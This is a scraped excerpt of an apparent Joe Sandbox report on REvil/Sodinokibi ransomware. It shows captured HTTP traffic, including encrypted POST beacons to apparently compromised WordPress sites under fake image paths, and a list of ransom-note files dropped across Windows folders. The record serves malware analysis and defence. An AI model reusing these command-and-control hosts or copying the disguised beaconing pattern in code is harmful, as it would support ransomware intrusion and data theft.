2024-09-09 10:07:20 UTC	204	OUT	GET / HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Host: www.altitudetrampolinepark.com
2024-09-09 10:07:20 UTC	908	IN	HTTP/1.1 200 OK Date: Mon, 09 Sep 2024 10:07:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Age: 0 Cache-Control: public,max-age=0,must-revalidate cache-status: "Netlify Edge"; fwd=stale referrer-policy: no-referrer-when-downgrade vary: Accept-Encoding x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-nf-request-id: 01J7B413F97MBTJ79GMXHVFG0F x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u2XO9KODDyVW1NC0qIvqB73PTncxhTfOS%2FjPCBowRvSH1%2BMcsJ5MC67%2Bn5bPQuvxGaSvy89Z%2FseRP2d69elucXsxuallBGI8JtWvtHK%2BwAbcJKxCVJ5Ne0WFt%2BmGJIuovtjAQtxB7AqZK8KPszYrLA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c065ee93d7e42c0-EWR alt-svc: h3=":443"; ma=86400
2024-09-09 10:07:20 UTC	461	IN	Data Raw: 37 63 32 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 6e 2d 68 65 61 64 2d 73 73 72 20 6c 61 6e 67 3d 22 65 6e 22 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 25 37 42 25 32 32 6c 61 6e 67 25 32 32 3a 25 37 42 25 32 32 73 73 72 25 32 32 3a 25 32 32 65 6e 25 32 32 25 37 44 25 37 44 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 64 61 74 61 2d 68 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c Data Ascii: 7c25<!doctype html><html data-n-head-ssr lang="en" data-n-head="%7B%22lang%22:%7B%22ssr%22:%22en%22%7D%7D"><head><meta data-n-head="ssr" charset="utf-8"><meta data-n-head="ssr" name="viewport" data-hid="viewport" content="width=device-width,initial-scal
2024-09-09 10:07:20 UTC	1369	IN	Data Raw: 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 6e 61 6d 65 3d 22 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 64 61 74 61 2d 68 69 64 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 74 69 74 6c 65 22 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 74 69 74 75 64 65 20 54 72 61 6d 70 6f 6c 69 6e 65 20 50 61 72 6b 22 3e 3c 6d 65 74 61 20 64 61 74 61 2d 6e 2d 68 65 61 64 3d 22 73 73 72 22 20 64 61 74 61 2d 68 69 64 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 Data Ascii: b-app-capable" name="mobile-web-app-capable" content="yes"><meta data-n-head="ssr" data-hid="apple-mobile-web-app-title" name="apple-mobile-web-app-title" content="Altitude Trampoline Park"><meta data-n-head="ssr" data-hid="theme-color" name="theme-color"
2024-09-09 10:07:20 UTC	1369	IN	Data Raw: 6c 69 6e 65 2c 20 6b 69 64 73 2c 20 79 6f 75 6e 67 2c 20 6a 75 6d 70 2c 20 62 69 72 74 68 64 61 79 2c 20 6e 69 6e 6a 61 2c 20 74 75 6d 62 6c 65 2c 20 74 75 6d 62 6c 69 6e 67 2c 20 70 61 72 74 79 2c 20 66 61 6d 69 6c 79 2c 20 66 75 6e 2c 20 69 6e 64 6f 6f 72 2c 20 61 63 74 69 76 69 74 79 2c 20 61 63 74 69 76 69 74 69 65 73 2c 20 6a 75 6d 70 69 6e 67 2c 20 64 6f 64 67 65 62 61 6c 6c 2c 20 72 75 6e 2c 20 73 6b 79 2c 20 74 68 72 69 6c 6c 2c 20 74 68 72 69 6c 6c 73 74 72 61 6d 70 6f 6c 69 6e 65 2c 20 6b 69 64 73 2c 20 79 6f 75 6e 67 2c 20 6a 75 6d 70 2c 20 62 69 72 74 68 64 61 79 2c 20 6e 69 6e 6a 61 2c 20 74 75 6d 62 6c 65 2c 20 74 75 6d 62 6c 69 6e 67 2c 20 70 61 72 74 79 2c 20 66 61 6d 69 6c 79 2c 20 66 75 6e 2c 20 69 6e 64 6f 6f 72 2c 20 61 63 74 69 76 69 Data Ascii: line, kids, young, jump, birthday, ninja, tumble, tumbling, party, family, fun, indoor, activity, activities, jumping, dodgeball, run, sky, thrill, thrillstrampoline, kids, young, jump, birthday, ninja, tumble, tumbling, party, family, fun, indoor, activi
2024-09-09 10:07:20 UTC	1369	IN	Data Raw: 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 5f 6e 75 78 74 2f 61 38 32 32 30 36 62 2e 6a 73 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 5f 6e 75 78 74 2f 32 32 39 30 34 62 35 2e 6a 73 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 5f 6e 75 78 74 2f 37 66 32 65 61 39 61 2e 6a 73 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 5f 6e 75 78 74 2f 62 34 34 34 61 32 37 2e 6a 73 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 Data Ascii: script"><link rel="preload" href="/_nuxt/a82206b.js" as="script"><link rel="preload" href="/_nuxt/22904b5.js" as="script"><link rel="preload" href="/_nuxt/7f2ea9a.js" as="script"><link rel="preload" href="/_nuxt/b444a27.js" as="script"><link rel="preload"
2024-09-09 10:07:20 UTC	1369	IN	Data Raw: 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 55 62 75 6e 74 75 2c 43 61 6e 74 61 72 65 6c 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 22 53 65 67 6f 65 20 55 49 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 3b 6d 61 72 67 69 6e 3a 30 7d 68 72 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 68 65 69 67 68 74 3a 30 7d 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 64 6f 74 74 65 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c Data Ascii: ,Segoe UI,Roboto,Ubuntu,Cantarell,Noto Sans,sans-serif,"Segoe UI",Helvetica,Arial,"Apple Color Emoji","Segoe UI Emoji";margin:0}hr{color:inherit;height:0}abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underl
2024-09-09 10:07:20 UTC	1369	IN	Data Raw: 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 55 62 75 6e 74 75 2c 43 61 6e 74 61 72 65 6c 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 22 53 65 67 6f 65 20 55 49 22 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 41 72 69 61 6c 2c 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b Data Ascii: tem-ui,-apple-system,Segoe UI,Roboto,Ubuntu,Cantarell,Noto Sans,sans-serif,BlinkMacSystemFont,"Segoe UI","Helvetica Neue",Arial,"Noto Sans","Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";line-height:1.5}body{font-family:inherit;
2024-09-09 10:07:20 UTC	1369	IN	Data Raw: 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 32 30 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 34 34 30 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 34 34 30 70 78 7d 7d 2e 61 62 73 6f 6c 75 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 72 65 6c 61 74 69 76 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 73 74 69 63 6b 79 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 69 63 6b 79 7d 2e 6d 78 2d 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6d 78 2d 61 75 74 6f 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f Data Ascii: }@media (min-width:1200px){.container{max-width:1200px}}@media (min-width:1440px){.container{max-width:1440px}}.absolute{position:absolute}.relative{position:relative}.sticky{position:sticky}.mx-1{margin-left:5px;margin-right:5px}.mx-auto{margin-left:auto
2024-09-09 10:07:20 UTC	1369	IN	Data Raw: 20 73 6b 65 77 58 28 76 61 72 28 2d 2d 74 77 2d 73 6b 65 77 2d 78 29 29 20 73 6b 65 77 59 28 76 61 72 28 2d 2d 74 77 2d 73 6b 65 77 2d 79 29 29 20 73 63 61 6c 65 58 28 76 61 72 28 2d 2d 74 77 2d 73 63 61 6c 65 2d 78 29 29 20 73 63 61 6c 65 59 28 76 61 72 28 2d 2d 74 77 2d 73 63 61 6c 65 2d 79 29 29 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 7b 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 74 75 72 6e 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 69 6e 67 7b 37 35 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 32 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 75 6c 73 65 7b 35 30 25 7b 6f 70 61 63 69 74 79 3a 2e 35 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 7b 30 25 2c 74 6f 7b Data Ascii: skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))}@keyframes spin{to{transform:rotate(1turn)}}@keyframes ping{75%,to{opacity:0;transform:scale(2)}}@keyframes pulse{50%{opacity:.5}}@keyframes bounce{0%,to{
2024-09-09 10:07:20 UTC	1369	IN	Data Raw: 67 2d 6c 65 66 74 3a 31 30 70 78 7d 2e 74 65 78 74 2d 6c 65 66 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 74 65 78 74 2d 63 65 6e 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 65 78 74 2d 62 61 73 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 75 70 70 65 72 63 61 73 65 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 69 74 61 6c 69 63 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 7d 2e 74 65 78 74 2d 77 68 69 74 65 7b 2d 2d 74 77 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 76 61 72 28 2d 2d 74 77 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 7d 2a 2c 3a 61 66 74 65 Data Ascii: g-left:10px}.text-left{text-align:left}.text-center{text-align:center}.text-base{font-size:16px}.uppercase{text-transform:uppercase}.italic{font-style:italic}.text-white{--tw-text-opacity:1;color:#fff;color:rgba(255,255,255,var(--tw-text-opacity))}*,:afte
2024-09-09 10:07:20 UTC	1369	IN	Data Raw: 6f 75 6e 64 2d 63 6f 6c 6f 72 2c 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2c 63 6f 6c 6f 72 2c 66 69 6c 6c 2c 73 74 72 6f 6b 65 2c 6f 70 61 63 69 74 79 2c 62 6f 78 2d 73 68 61 64 6f 77 2c 74 72 61 6e 73 66 6f 72 6d 2c 66 69 6c 74 65 72 2c 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 70 72 6f 70 65 72 74 79 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 2c 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2c 63 6f 6c 6f 72 2c 66 69 6c 6c 2c 73 74 72 6f 6b 65 2c 6f 70 61 63 69 74 79 2c 62 6f 78 2d 73 68 61 64 6f 77 2c 74 72 61 6e 73 66 6f 72 6d 2c 66 69 6c 74 65 72 2c 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 2c 2d 77 65 62 6b 69 74 2d 62 61 63 6b 64 72 6f 70 2d 66 69 6c 74 65 72 3b 74 72 61 6e 73 69 74 69 6f 6e 2d 74 69 6d 69 6e 67 Data Ascii: ound-color,border-color,color,fill,stroke,opacity,box-shadow,transform,filter,backdrop-filter;transition-property:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform,filter,backdrop-filter,-webkit-backdrop-filter;transition-timing

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:21 UTC	263	OUT	POST /static/tmp/vd.gif HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: lexced.com
2024-09-09 10:07:21 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:21 UTC	203	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 09 Sep 2024 10:07:21 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.lexced.com/static/tmp/vd.gif
2024-09-09 10:07:21 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:22 UTC	205	OUT	GET /static/tmp/vd.gif HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Host: www.lexced.com
2024-09-09 10:07:23 UTC	374	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 09 Sep 2024 10:07:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/8.3.11 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.lexced.com/wp-json/>; rel="https://api.w.org/"
2024-09-09 10:07:23 UTC	16010	IN	Data Raw: 31 63 63 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 2d 49 54 22 20 63 6c 61 73 73 3d 22 68 2d 31 30 30 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 62 73 74 63 6b 5f 63 6f 6e 74 65 78 74 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 65 78 63 65 64 22 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 62 73 74 63 6b 5f 63 6f 6e 74 65 78 74 3a 73 65 63 74 69 6f 6e 22 20 63 6f 6e Data Ascii: 1cc9<!doctype html><html lang="it-IT" class="h-100"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="pbstck_context:site_name" content="lexced"/><meta name="pbstck_context:section" con
2024-09-09 10:07:23 UTC	16384	IN	Data Raw: 28 27 74 72 61 63 6b 27 2c 20 27 50 61 67 65 56 69 65 77 27 2c 20 5b 5d 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 4d 65 74 61 20 50 69 78 65 6c 20 43 6f 64 65 20 2d 2d 3e 0a 3c 6e 6f 73 63 72 69 70 74 3e 0a 3c 69 6d 67 20 68 65 69 67 68 74 3d 22 31 22 20 77 69 64 74 68 3d 22 31 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 61 6c 74 3d 22 66 62 70 78 22 0a 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 74 72 3f 69 64 3d 37 36 32 36 32 32 36 34 39 31 32 31 31 38 39 26 65 76 3d 50 61 67 65 56 69 65 77 26 6e 6f 73 63 72 69 70 74 3d 31 22 20 2f 3e 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 45 6e 64 20 4d 65 74 61 20 50 69 78 65 6c 20 43 6f 64 65 20 2d 2d 3e 0a 0a 3c Data Ascii: ('track', 'PageView', []); </script>... Meta Pixel Code --><noscript><img height="1" width="1" style="display:none" alt="fbpx"src="https://www.facebook.com/tr?id=762622649121189&ev=PageView&noscript=1" /></noscript>... End Meta Pixel Code --><

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report myfile.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: REvil

Threatname: Sodinokibi

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Spam, unwanted Advertisements and Ransom Demands

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\$WinREAgent\Scratch\g165067x37-readme.txt

C:\$WinREAgent\g165067x37-readme.txt

C:\Program Files (x86)\g165067x37-readme.txt

C:\Program Files\g165067x37-readme.txt

C:\Recovery\g165067x37-readme.txt

C:\Users\Default\Desktop\g165067x37-readme.txt

C:\Users\Default\Documents\g165067x37-readme.txt

C:\Users\Default\Downloads\g165067x37-readme.txt

C:\Users\Default\Favorites\g165067x37-readme.txt

C:\Users\Default\Links\g165067x37-readme.txt

C:\Users\Default\Music\g165067x37-readme.txt

C:\Users\Default\NTUSER.DAT.LOG1

C:\Users\Default\NTUSER.DAT.LOG2

Windows Analysis Report
myfile.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:24 UTC	281	OUT	POST /data/graphic/tcafyhpt.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: chainofhopeeurope.eu
2024-09-09 10:07:24 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:24 UTC	374	IN	HTTP/1.1 404 Not Found Date: Mon, 09 Sep 2024 10:07:24 GMT Server: Apache/2.4.61 (Debian) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.chainofhopeeurope.eu/wp-json/>; rel="https://api.w.org/" Upgrade: h2 Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-09-09 10:07:24 UTC	7818	IN	Data Raw: 31 65 35 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6f 6c 64 69 65 20 69 65 36 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 09 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6f 6c 64 69 65 20 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 09 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6f 6c 64 69 65 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 Data Ascii: 1e5d<!doctype html>...[if lt IE 7 ]><html lang="fr-FR" class="no-js oldie ie6"> <![endif]-->...[if IE 7 ]><html lang="fr-FR" class="no-js oldie ie7"> <![endif]-->...[if IE 8 ]><html lang="fr-FR" class="no-js oldie ie8"> <![endif]-->...[if I
